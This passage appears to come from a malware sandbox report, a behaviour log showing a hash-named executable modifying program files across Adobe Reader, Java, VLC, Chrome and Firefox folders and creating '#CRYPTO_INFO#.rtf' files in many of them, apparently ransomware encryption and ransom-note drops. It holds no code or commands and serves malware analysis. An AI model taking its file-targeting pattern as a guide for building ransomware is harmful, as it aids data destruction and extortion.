DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ro-ro\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-sl\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\sv-se\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fil_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\access-bridge-64.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ks_IN\LC_MESSAGES\vlc.mo 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\pack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\s_listview_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\da-dk\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\en-gb\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaBrightRegular.ttf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluNoInternetConnection_120x80.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\rt.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell-2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\en-ae\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\tr-tr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\root\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_selected_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\localedata.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\download.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Java\jre1.8.0_66\lib\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\sw.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\rmid.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\pl-pl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\css\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_anonymoususer_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\s_filter_18.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\en-il\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\resources.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugin.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\VideoLAN\VLC\locale\id\LC_MESSAGES\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\acrobat_parcel_generic_32.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\pt-br\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.director.app_1.0.300.v20140228-1829.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\new_icons.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\fi_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\th_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_close_h2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fr-ma\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\contbig.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\hu-hu\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\nl-nl\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files\Mozilla Firefox\fonts\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-rdr-ja_jp_2x.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\da-dk\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\de-de\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-coredump.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\it-it\AppStore_icon.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\en_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\fr-fr\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_ja.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress-indeterminate.gif 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jre1.8.0_66\lib\ext\cldrdata.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\no_get.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\themes\dark\adobe_logo.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\gmail.crx 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\Close2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets.nl_zh_4.4.0.v20140623020002.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\it-it\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\digsig_icons_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\browse_window.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\view.html 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\S_IlluError_136x136.svg 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\chrome_100_percent.pak 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\themes\dark\nub.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\LimitRequest.wma 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\css\main.css 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\he-il\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\sl-si\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\Font\MinionPro-It.otf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\bin\pack200.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\bin\javac.exe 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-fr\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\uk-ua\ui-strings.js 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\it-it\#CRYPTO_INFO#.rtf 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-util-enumerations_zh_CN.jar 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\SearchEmail.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\core_icons_fw.png 8135a3e2d703c14354f8c32dfd4e5b63e8a25029ee733716ec2a41b0da3054aa.exe File opened for modification C:\Program 